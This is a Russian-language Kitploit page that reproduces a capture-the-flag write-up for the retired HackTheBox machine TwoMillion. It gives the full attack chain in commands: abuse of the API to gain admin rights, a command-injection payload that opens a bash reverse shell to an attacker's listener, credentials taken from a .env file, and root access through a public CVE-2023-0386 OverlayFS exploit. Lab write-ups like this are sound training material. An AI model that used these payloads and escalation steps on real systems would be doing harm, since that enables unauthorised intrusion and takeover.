Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
HTB-TwoMillion-Writeup — Разбор машины TwoMillion от HackTheBox — злоупотребление API, внедрение команд и CVE-2023-0386 | Kitploit
Инструменты/GitHubGitHub/karimelsheikh1/htb-twomillion-writeup
Повышение привилегийРазведкаАнализ уязвимостейЭксплуатацияЛатеральное перемещениеЭксплуатация веб-приложенийПост-эксплуатацияCTFТестирование на Проникновение

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Командование и Управление
Обучение и Образование
GitHubkarimelsheikh1/htb-twomillion-writeup

HTB-TwoMillion-Writeup

Разбор машины TwoMillion от HackTheBox — злоупотребление API, внедрение команд и CVE-2023-0386

Репозиторий
4 месяцев назадЕщё не проверено

HTB-TwoMillion-Writeup

HackTheBox — разбор машины TwoMillion — злоупотребление API, внедрение команд и CVE-2023-0386

HackTheBox — Разбор TwoMillion

HackTheBox — Разбор TwoMillion

HTB Difficulty OS

Информация о машине

ПолеЗначение
ИмяTwoMillion
СложностьEasy
ОСLinux
IP10.10.11.221
CVECVE-2023-0386

Краткое описание

TwoMillion — это простая Linux-машина, посвящённая старой платформе HackTheBox. Она включает расшифровку инвайт-кода, злоупотребление API-эндпоинтами, внедрение команд в ОС, поиск учётных данных и повышение привилегий через уязвимость ядра Linux CVE-2023-0386 (OverlayFS).


Разведка

Nmap

root@kitploit:~
nmap -sV -sC -v 10.10.11.221

Открытые порты:

  • 22 — OpenSSH 8.9p1
  • 80 — HTTP nginx → перенаправляет на 2million.htb

Добавить в /etc/hosts:

root@kitploit:~
echo "10.10.11.221 2million.htb" >> /etc/hosts

Шаг 1 — Инвайт-код

root@kitploit:~
curl -X POST http://2million.htb/api/v1/invite/how/to/generate

Ответ закодирован в ROT13. Расшифровать:

root@kitploit:~
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'

Сгенерировать инвайт-код:

root@kitploit:~
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d

Зарегистрироваться на http://2million.htb/register, используя расшифрованный инвайт-код.


Шаг 2 — Злоупотребление API → Администратор

Войти через браузер, получить PHPSESSID из куки (F12 → Application → Cookies).

Повысить до администратора:

root@kitploit:~
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
  -b "PHPSESSID=<your_session>" \
  -H "Content-Type: application/json" \
  --data '{"email":"[email protected]","is_admin":1}'

Проверить:

root@kitploit:~
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}

Шаг 3 — Внедрение команд → Реверс-шелл

Запустить слушатель:

root@kitploit:~
nc -lvnp 4444

Отправить пейлоад реверс-шелла:

root@kitploit:~
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
  -b "PHPSESSID=<your_session>" \
  -H "Content-Type: application/json" \
  --data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'

Шелл получен как www-data.


Шаг 4 — Флаг пользователя

Найти учётные данные в .env:

root@kitploit:~
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123

Войти по SSH:

root@kitploit:~
ssh [email protected]
cat ~/user.txt

Шаг 5 — Флаг root (CVE-2023-0386)

Проверить подсказку:

root@kitploit:~
cat /var/mail/admin
uname -r
# 5.15.70 — уязвим к CVE-2023-0386

Скачать и скомпилировать эксплойт на Kali:

root@kitploit:~
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all

Передать на цель:

root@kitploit:~
# Kali
python3 -m http.server 8000

# Цель
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all

Запустить в двух терминалах на цели:

Терминал 1:

root@kitploit:~
./fuse ./ovlcap/lower ./gc

Терминал 2:

root@kitploit:~
./exp

Получить root-флаг:

root@kitploit:~
cat /root/root.txt

Цепочка атаки


Использованные инструменты

  • Nmap
  • curl
  • Netcat
  • CVE-2023-0386 PoC

Этот разбор предназначен только для образовательных целей на снятой с производства машине HackTheBox.

Скачать инструмент
ШагТехника
РазведкаСканирование Nmap
Инвайт-кодРасшифровка ROT13 + Base64
Web-повышение привилегийМанипуляция API → админ
Первичный шеллВнедрение команд ОС
Горизонтальное перемещениеУчётные данные из .env → SSH
RootЭксплойт OverlayFS CVE-2023-0386